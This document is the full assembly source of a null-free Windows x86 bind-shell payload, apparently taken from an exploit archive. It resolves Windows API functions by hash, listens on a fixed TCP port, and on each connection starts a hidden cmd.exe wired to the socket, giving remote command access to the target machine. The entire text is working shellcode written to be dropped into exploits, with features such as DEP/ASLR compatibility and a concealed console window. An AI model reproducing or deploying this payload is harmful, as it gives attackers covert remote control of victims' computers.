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windows x86 null-free bindshell for Windows 5.0-7.0 all service packs
===================================================================== Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs ===================================================================== BITS 32 ; Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs. ; (See http://skypher.com/wiki/index.php/Hacking/Shellcode/Bind/NGS). ; Based largely on code and ideas (C) 2005 by Dafydd Stuttard, NGS Software. ; (See http://www.ngssoftware.com/papers/WritingSmallShellcode.pdf). ; Thanks to Pete Beck. ; ; Features both in this and the original code: ; + NULL Free ; + Windows version and service pack independant. ; Improvements of this code over the original: ; + No assumptions are made about the values of registers. ; + "/3GB" compatible: pointers are not assume to be smaller than 0x80000000. ; + DEP/ASLR compatible: data is not executed, code is not modified. ; + Windows 7 compatible: kernel32 is found based on the length of its name. ; + Stealth: does not display a console windows on the target machine when ; cmd.exe is executed. ; + Allows an unlimited number of consecutive connections. ; + Can except connections on almost any port. The range of acceptable port ; numbers is only limited by the fact that the negative value of the port ; number must not contain nulls. port equ 28876 ; The port number to bind to. %if ((-port & 0xFF) == 0) || (-port & 0xFF00 == 0) %error The given port number would result in NULLs in the code :( %endif AF_INET equ 2 ; These hashes are calculated with a separate tool. hash_xor_value equ 0x71 hash_start_value equ 0x36 hash_kernel32_CreateProcessA equ 0xB7 hash_kernel32_LoadLibraryA equ 0x8F hash_ws2_32_WSAStartup equ 0x09 hash_ws2_32_WSASocketA equ 0x98 hash_ws2_32_bind equ 0x66 hash_ws2_32_listen equ 0x56 hash_ws2_32_accept equ 0x77 sizeof_proc_address_table equ 7 * 4 offset_WSAStartup_in_hash_table equ 2 offset_accept_in_hash_table equ 6 %define B2W(b1,b2) (((b2) << 8) + (b1)) %define W2DW(w1,w2) (((w2) << 16) + (w1)) %define B2DW(b1,b2,b3,b4) (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1)) start: XOR ECX, ECX ; ECX = 0 ; Find base address of kernel32.dll. This code should work on Windows 5.0-7.0 MOV ESI, [FS:ECX + 0x30] ; ESI = &(PEB) ([FS:0x30]) MOV ESI, [ESI + 0x0C] ; ESI = PEB->Ldr MOV ESI, [ESI + 0x1C] ; ESI = PEB->Ldr.InInitOrder (first module) next_module: MOV EBP, [ESI + 0x08] ; EBP = InInitOrder[X].base_address MOV EDI, [ESI + 0x20] ; EDI = InInitOrder[X].module_name (unicode string) MOV ESI, [ESI] ; ESI = InInitOrder[X].flink (next module) CMP [EDI + 12*2], CL ; modulename[12] == 0 ? strlen("kernel32.dll") == 12 JNE next_module ; No: try next module. ; Create hash table and "ws2_32" (for LoadLibraryA) on the stack: PUSH ECX ; Stack = 00 00 00 00 PUSH B2DW('2', '_', '3', '2') ; Stack = "s2_32" %if (hash_ws2_32_accept != 'w') %error The hash for ws2_32.accept is not a 'w' %endif PUSH B2DW(hash_ws2_32_bind, hash_ws2_32_listen, hash_ws2_32_accept, 's') ; hash, hash, "ws2_32" end_of_hash_table_marker equ 's' PUSH B2DW(hash_kernel32_CreateProcessA, hash_kernel32_LoadLibraryA, hash_ws2_32_WSAStartup, hash_ws2_32_WSASocketA) sizeof_hash_table equ 7 MOV ESI, ESP ; ESI -> Hash table ; Reserve space for WSADATA MOV CH, 0x3 ; ECX = 0x300 SUB ESP, ECX ; Reserve space for WSADATA ; Create a bunch of NULLs on the stack SUB ESP, ECX ; Reserve space for NULLs MOV EDI, ESP ; EDI = &(NULLs) SALC ; AL = 0 REP STOSB ; ; Prepare arguments for various functions on the stack: ; WSASocket(__in int af=2, __in int type=1, __in int protocol=0, ; __in LPWSAPROTOCOL_INFO lpProtocolInfo=0, __in GROUP g=0, ; __in DWORD dwFlags=0) ; __in LPWSAPROTOCOL_INFO lpProtocolInfo=0 ; __in GROUP g=0 ; __in DWORD dwFlags=0 ; __in int protocol=0 INC ECX ; PUSH ECX ; __in int type = SOCK_STREAM (1) INC ECX ; PUSH ECX ; __in int af = AF_INET (2) ; WSAStartup(__in WORD wVersionRequested=2, __out LPWSADATA lpWSADATa=stack) PUSH EDI ; __out LPWSADATA lpWSAData = &(WSADATA) PUSH ECX ; __in WORD wVersionRequested = 2 (2.0) ; Set up EDI so that a proc addresses table can be created in the NULLs, ; followed by sufficient space to store a struct sockaddr_in: SUB EDI, BYTE sizeof_proc_address_table + sizeof_sockaddr_in get_proc_address_loop: MOVSB ; [EDI] = hash DEC EDI ; Restore EDI ; Find the PE header and export and names tables of the module: MOV EBX, [EBP + 0x3C] ; EBX = &(PE header) MOV EBX, [EBP + EBX + 0x78] ; EBX = offset(export table) ADD EBX, EBP ; EBX = &(export table) MOV ECX, [EBX + 0x20] ; ECX = offset(names table) ADD ECX, EBP ; ECX = &(names table) PUSH ESI ; Save ESI ; Hash each function name and check it against the requested hash: XOR EDX, EDX ; EDX = function number (0) next_function_loop: ; Get the next function name: INC EDX ; Increment function number MOV ESI, [ECX + EDX * 4] ; ESI = offset(function name) ADD ESI, EBP ; ESI = &(function name) MOV AH, hash_start_value ; Initialize the hash hash_loop: ; Hash the function name: LODSB ; Load a character of the function name XOR AL, hash_xor_value ; Calculate a hash SUB AH, AL ; CMP AL, hash_xor_value ; Is this the terminating 0 byte? JNE hash_loop ; No: continue hashing CMP AH, [EDI] ; Yes: Does the hash match ? ; Check if the hash matches and loop if not: JNZ next_function_loop POP ESI ; Restore ESI ; Find the address of the requested function: MOV ECX, [EBX + 0x24] ; ECX = offset ordinals table ADD ECX, EBP ; ECX = &oridinals table MOVZX EDX, WORD [ECX + 2 * EDX] ; EDX = ordinal number of function MOV ECX, [EBX + 0x1C] ; ECX = offset address table ADD ECX, EBP ; ECX = &address table MOV EAX, EBP ; EAX = &(module) ADD EAX, [ECX + 4 * EDX] ; EAX = &(function) ; Save the address of the requested function: STOSD ; Save proc address ; When needed, call LoadLibraryA to start looking for ws2_32.dll functions: CMP BYTE [ESI], hash_ws2_32_WSAStartup ; We just found LoadLibraryA JNE skip_load_library ; LEA EBX, [ESI - offset_WSAStartup_in_hash_table + offset_accept_in_hash_table] PUSH EBX ; __in LPCTSTR lpFileName = &("ws2_32") CALL EAX ; LoadLibraryA(&"ws2_32") PUSH EDI ; Save proc address table[WSAStartup] XCHG EAX, EBP ; EBP = &(ws2_32.dll) skip_load_library: ; Continue until all hashes have been found: CMP BYTE [ESI], end_of_hash_table_marker JNE get_proc_address_loop ; POP ESI ; Call WSAStartup (Arguments are already on the stack) LODSD CALL EAX ; WSASTARTUP ; Call WSASocket (Arguments are already on the stack) LODSD CALL EAX XCHG EAX, EBP ; EBP = Server socket ; Create a struct sockaddr_in on the stack for use by bind() sizeof_sockaddr_in equ 2 + 2 + 4 + 8 SUB DWORD [EDI], -W2DW( AF_INET, B2W(port >> 8, port & 0xFF)); sin_family = AF_INET, sin_port = (port, little endian!) ; Set up the 2nd and 3rd argument for bind: ; bind(__in SOCKET s=(added later), __in const struct sockaddr *name, __in int namelen) PUSH BYTE 0x10 ; __in int namelen = 0x10 PUSH EDI ; __in const struct sockaddr *name = &(sockaddr_in) ; bind(), listen() and accept() all take the server socket as their first ; argument. listen() and accept() only need NULLs for the remaining arguments ; and the arguments for bind() are already on the stack. Because bind() and ; accept() return 0 and listen() returns a socket, which is not 0, a loop can be ; used to call them: ; listen(__in SOCKET s=(added later), __in int backlog=0) ; accept(__in SOCKET s=(added later), __in struct sockaddr *addr=0, __inout int *addrlen=0) call_loop: LODSD accept_loop: PUSH EBP ; __in SOCKET s = Server socket descriptor CALL EAX ; Check if accept() has returned a socket: TEST EAX, EAX JZ call_loop ; Create structures on the stack for CreateProcessA ; STARTUPINFO { ; DWORD cb 00-03: >= sizeof(STARTUPINFO) ; LPTSTR lpReserved 04-07: 0 ; LPTSTR lpDesktop 08-0B: 0 ; LPTSTR lpTitle 0C-0F: 0 ; DWORD dwX 10-13: 0 ; DWORD dwY 14-17: 0 ; DWORD dwXSize 18-1B: 0 ; DWORD dwYSize 1C-1F: 0 ; DWORD dwXCountChars 20-23: 0 ; DWORD dwYCountChars 24-27: 0 ; DWORD dwFillAttribute 28-2B: 0 ; DWORD dwFlags 2C-2F: (STARTF_USESTD_HANDLES 0x100) ; WORD wShowWindow 30-31: 0 ; WORD cbReserved2 32-33: 0 ; LPBYTE lpReserved2 34-37: 0 ; HANDLE hStdInput 38-3B: (Socket descriptor) ; HANDLE hStdOutput 3C-3F: (Socket descriptor) ; HANDLE hStdError 40-43: (Socket descriptor) ; } sizeof_STARTUPINFO equ 0x44 offset_dwFlags_in_STARTUPINFO equ 0x2C offset_hStdInput_in_STARTUPINFO equ 0x38 ; Each call to accept() removes two DWORDS off the stack. These must be put back ; or ESP will run off the stack eventually: XOR EDX, EDX ; EDX = 0 PUSH EDX ; Restore stack #1 ; We'll also create a struct STARTUPINFO PUSH B2DW('c', 'm', 'd', ' ') ; Restore stack #2 and STARTUPINFO.cb = "cmd " (> 0) LEA EDI, [ESP + offset_hStdInput_in_STARTUPINFO]; EDI = &(STARTUPINFO.hStdInput) STOSD ; STARTUPINFO.hStdInput = Socket descriptor STOSD ; STARTUPINFO.hStdOutput = Socket descriptor STOSD ; STARTUPINFO.hStdError = Socket descriptor MOV BYTE [EDI - sizeof_STARTUPINFO + offset_dwFlags_in_STARTUPINFO + 1], 1 ; STARTUPINFO.dwFlags = STARTF_USESTDHANDLES (0x100) ; CreateProcess(...) PUSH ESP ; __out LPPROCESS_INFORMATION lpProcessInformation == &(STARTUPINFO) XCHG [ESP], EDI ; __out LPPROCESS_INFORMATION lpProcessInformation == &(STARTUPINFO) + sizeof(STARTUPINFO) PUSH EDI ; __in LPSTARTUPINFO lpStartupInfo == &(STARTUPINFO) PUSH EDX ; __in_opt LPCTSTR lpCurrentDirectory = NULL PUSH EDX ; __in_opt LPVOID lpEnvironment = NULL PUSH EDX ; __in DWORD dwCreationFlags = 0 MOV BYTE [EDI-5*4+3], 0x8 ; __in DWORD dwCreationFlags = CREATE_NO_WINDOW (0x08000000) PUSH EDI ; __in BOOL bInheritHandles = TRUE (>0) PUSH EDX ; __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes = NULL PUSH EDX ; __in_opt LPSECURITY_ATTRIBUTES lpProcessAttributes = NULL PUSH EDI ; __inout_opt LPTSTR lpCommandLine = &("cmd ") PUSH EDX ; __in_opt LPCTSTR lpApplicationName = NULL CALL [ESI - sizeof_proc_address_table] ; Load accept() into EAX and jump back into our code. MOV EAX, [ESI - 4] JMP accept_loop ; # 0day.today [2024-11-15] #